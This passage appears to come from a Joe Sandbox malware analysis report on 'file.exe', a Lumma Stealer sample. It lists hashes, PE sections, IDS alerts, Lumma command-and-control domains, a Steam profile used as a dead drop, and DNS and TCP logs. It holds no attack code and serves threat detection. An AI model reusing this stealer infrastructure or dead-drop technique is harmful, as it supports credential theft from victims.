                        https://community.akamai.steamstatic.com/public/javascriHfile.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://store.steampowered.com/about/file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          188.114.96.3
                          sensatinwu.buzzEuropean Union
                          13335CLOUDFLARENETUStrue
                          104.102.49.254
                          steamcommunity.comUnited States
                          16625AKAMAI-ASUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1526563
                          Start date and time:2024-10-06 10:43:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 47s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@10/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          04:43:56API Interceptor1x Sleep call for process: file.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.114.96.3c1#U09a6.exeGet hashmaliciousUnknownBrowse
                          • winfileshare.com/ticket_line/llb.php
                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/eZFzMENr/download
                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/eZFzMENr/download
                          1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                          • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                          http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                          • asm.alcateia.org/
                          hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                          • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                          z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                          • www.bayarcepat19.click/g48c/
                          update SOA.exeGet hashmaliciousFormBookBrowse
                          • www.bayarcepat19.click/5hcm/
                          docs.exeGet hashmaliciousFormBookBrowse
                          • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                          https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                          • wwvmicrosx.live/office365/office_cookies/main/
                          104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                          • www.valvesoftware.com/legal.htm
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSConfirm Me.exeGet hashmaliciousSTRRATBrowse
                          • 104.20.3.235
                          PInstaller.exeGet hashmaliciousSTRRATBrowse
                          • 104.20.3.235
                          file.exeGet hashmaliciousLummaCBrowse
                          • 172.67.151.30
                          updater.exeGet hashmaliciousXmrigBrowse
                          • 172.67.162.29
                          file.exeGet hashmaliciousLummaCBrowse
                          • 172.67.151.30
                          http://www.grandsignatureyercaud.com/Get hashmaliciousUnknownBrowse
                          • 104.21.51.144
                          http://www.nesianlife.com/Get hashmaliciousUnknownBrowse
                          • 104.18.39.195
                          https://daf2019.com/8/02Get hashmaliciousUnknownBrowse
                          • 172.65.190.172
                          https://wtm.entree-plat-dessert.com/r/eNqtj01vgkAQhn8NvVXcL1gOplGBqgUraGrx0gC7iquAwqLVX99Ve2iT9ubMHN6ZyeSd56hbEBqA6oCbGCPCAQM0phBhC7IUJHBp4phQznVAEdGxSfQEotRYwjYyKWMGQTFoQwMCK4mxCmupt1U2+lPTyaTc1RrqatBVxVmLF7Li/HG3jeUj43XNK9lKy/yyRy7nGrJv32jQUHf2UdkpuVfSXC6C9bAo5mAqNzN3IcLBoB0KacxNSptTOZpGXmrlfX/q7OFn8n7yUEaceiRW/VPoRudGgwT2crMOCCGr4Xl86V1zIgp5juC1sfd2lCXe8KU7Pryth8GiG+RWUUQEilF2skVEzh6ejS3PwcBeGTPfB5zNXTo5YPHsrF+vDscJq+zellaxHwrkrW62I0kdAcp+Qvz5oCw3ySY+bGyF1sj8oy6bKr2wF9vvSc7ZusnVJOMx49UDSzt34P9N/4P9DuR/cP9H/QVY0sGGGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          https://blmphilly.com/Get hashmaliciousUnknownBrowse
                          • 172.66.0.227
                          AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.102.49.254
                          • 188.114.96.3
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947667301065339
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'836'032 bytes
                          MD5:c8916aae53838af9e4dd5b25929c3011
                          SHA1:137ee51345eb0ba5009f4c2f8e063dfa02d4da94
                          SHA256:20c63022ebdfb3653fc44fe6a87e42dcff15a06bf396d7ff361921f0d9c38871
                          SHA512:f82bf17e928acdef01a586d2796d1c5b503f1a8326167fd195fcbb4b3d03f17cfacc8a502418a276d9b8c9c1e72da5a9c6e07c896017de0e7d4868ee4d18f1a6
                          SSDEEP:49152:VfvQfcgy9NcMEkIda8tRp42GeLqf/ZpN:R/gyr12aw45eGf/
                          TLSH:58853310A23D587FE5CE52B3114E537DE2E10E2A7A54705BDF23A97E614F80E34B1AB8
                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................PI...........@...........................I...........@.................................W...k..
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x895000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FC834F399DAh
                          psrad mm3, qword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          and al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+0Ah], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or byte ptr [eax+00000000h], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          and al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x5d0000x25e00accfa2f8ab08d4414d50856f02b36a24False0.9995294451320133data7.984616310053154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x600000x29d0000x200f563be2fc00b066e15e06dd18793584dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          trxxvdbn0x2fd0000x1970000x196a00d76cbcbb81180ea5caae0325868c8320False0.9939460930295112data7.953378514979776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          psadlvyt0x4940000x10000x60026dd9c8d0e3670d9de5d5d8dabe725adFalse0.5826822916666666data5.085239526829499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x4950000x30000x220059c2056db01d99d9101b6e5458f463d7False0.07295496323529412DOS executable (COM)0.9427273502678457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLLImport
                          kernel32.dlllstrcpy
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-06T10:43:56.857343+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.5561231.1.1.153UDP
                          2024-10-06T10:43:57.624664+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.5652461.1.1.153UDP
                          2024-10-06T10:43:57.695007+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.5525151.1.1.153UDP
                          2024-10-06T10:43:57.706846+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.5500541.1.1.153UDP
                          2024-10-06T10:43:57.722814+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.5576891.1.1.153UDP
                          2024-10-06T10:43:57.733408+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.5555961.1.1.153UDP
                          2024-10-06T10:43:57.745624+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.5615791.1.1.153UDP
                          2024-10-06T10:43:57.757952+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.5608821.1.1.153UDP
                          2024-10-06T10:44:00.065879+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.96.3443TCP
                          2024-10-06T10:44:00.065879+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 6, 2024 10:43:57.804502010 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:57.804538965 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:57.804699898 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:57.805706024 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:57.805727005 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.477006912 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.477133036 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.480880022 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.480900049 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.481420994 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.526150942 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.537293911 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.579421043 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968300104 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968350887 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968502045 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.968502998 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.968519926 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968542099 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968590975 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968617916 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:58.968651056 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.968651056 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.968651056 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:58.968683004 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.068048954 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.068110943 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.068357944 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.068357944 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.068389893 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.068459034 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.073565006 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.073635101 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.073782921 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.073847055 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.073857069 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.073998928 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.074048996 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.074609995 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.074630022 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.074645042 CEST49704443192.168.2.5104.102.49.254
                          Oct 6, 2024 10:43:59.074651003 CEST44349704104.102.49.254192.168.2.5
                          Oct 6, 2024 10:43:59.090253115 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.090322018 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:43:59.090409994 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.090790987 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.090821028 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:43:59.580157995 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:43:59.580467939 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.582922935 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.582977057 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:43:59.583400011 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:43:59.584945917 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.584991932 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:43:59.585076094 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:44:00.065845013 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:44:00.065954924 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:44:00.066132069 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:44:00.066879988 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:44:00.066943884 CEST44349705188.114.96.3192.168.2.5
                          Oct 6, 2024 10:44:00.067027092 CEST49705443192.168.2.5188.114.96.3
                          Oct 6, 2024 10:44:00.067047119 CEST44349705188.114.96.3192.168.2.5
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 6, 2024 10:43:56.857342958 CEST5612353192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.618436098 CEST53561231.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.624664068 CEST6524653192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.654746056 CEST53652461.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.695007086 CEST5251553192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.705060005 CEST53525151.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.706845999 CEST5005453192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.716011047 CEST53500541.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.722814083 CEST5768953192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.731739044 CEST53576891.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.733407974 CEST5559653192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.742486000 CEST53555961.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.745624065 CEST6157953192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.754226923 CEST53615791.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.757951975 CEST6088253192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.766473055 CEST53608821.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:57.780620098 CEST6417453192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:57.788106918 CEST53641741.1.1.1192.168.2.5
                          Oct 6, 2024 10:43:59.076356888 CEST4943153192.168.2.51.1.1.1
                          Oct 6, 2024 10:43:59.089487076 CEST53494311.1.1.1192.168.2.5
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 6, 2024 10:43:56.857342958 CEST192.168.2.51.1.1.10x221dStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.624664068 CEST192.168.2.51.1.1.10xff6bStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.695007086 CEST192.168.2.51.1.1.10x9b52Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.706845999 CEST192.168.2.51.1.1.10x6b86Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.722814083 CEST192.168.2.51.1.1.10xeb52Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.733407974 CEST192.168.2.51.1.1.10xd9deStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.745624065 CEST192.168.2.51.1.1.10x5626Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.757951975 CEST192.168.2.51.1.1.10xb0b0Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.780620098 CEST192.168.2.51.1.1.10x6848Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:59.076356888 CEST192.168.2.51.1.1.10xb352Standard query (0)sensatinwu.buzzA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 6, 2024 10:43:57.618436098 CEST1.1.1.1192.168.2.50x221dName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.654746056 CEST1.1.1.1192.168.2.50xff6bName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.705060005 CEST1.1.1.1192.168.2.50x9b52Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.716011047 CEST1.1.1.1192.168.2.50x6b86Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.731739044 CEST1.1.1.1192.168.2.50xeb52Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.742486000 CEST1.1.1.1192.168.2.50xd9deName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.754226923 CEST1.1.1.1192.168.2.50x5626Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.766473055 CEST1.1.1.1192.168.2.50xb0b0Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:57.788106918 CEST1.1.1.1192.168.2.50x6848No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:59.089487076 CEST1.1.1.1192.168.2.50xb352No error (0)sensatinwu.buzz188.114.96.3A (IP address)IN (0x0001)false
                          Oct 6, 2024 10:43:59.089487076 CEST1.1.1.1192.168.2.50xb352No error (0)sensatinwu.buzz188.114.97.3A (IP address)IN (0x0001)false
                          • steamcommunity.com
                          • sensatinwu.buzz
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704104.102.49.2544436360C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          2024-10-06 08:43:58 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Host: steamcommunity.com
